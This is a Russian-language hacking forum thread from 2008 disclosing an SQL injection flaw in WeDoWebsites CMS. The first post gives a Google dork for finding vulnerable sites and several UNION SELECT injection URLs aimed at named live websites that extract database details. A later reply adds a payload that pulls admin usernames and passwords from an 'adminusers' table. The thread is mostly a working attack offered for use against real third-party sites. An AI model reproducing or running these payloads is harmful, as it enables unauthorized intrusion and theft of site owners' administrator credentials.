 |
WeDoWebsites CMS Remote SQL Injection Vulnerability |
04.01.2008, 08:33
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
WeDoWebsites CMS Remote SQL Injection Vulnerability
*******************WeDoWebsites Content Management System*******************
AUTHOR: Ded MustD!e
GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
LINK: http://www.wedowebsites.co.nz/
EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
EXAMPLES:
Код:
http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6/*
Код:
http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a, user(),version(),database()),4,5,6/*
Код:
http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws( 0x3a,user(),version(),database()),6/*
P.S. А вообще в гугле 5 страниц с примерами  . Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.
************************************************** ************************* |
|
|
04.01.2008, 20:11
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
у меня выводится 11 полей =)
кмс платная что ли? в чем проблема узнать, какие там таблицы?
|
|
|
|
05.01.2008, 15:29
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
по-видимому да, я так и не нашел, где слить исходники
|
|
|
|
05.01.2008, 17:41
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Код:
-1+union+select+1,2,3,4,concat_ws(0x3a,usr,pwd),6+from+adminusers+limit+0,1/*
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
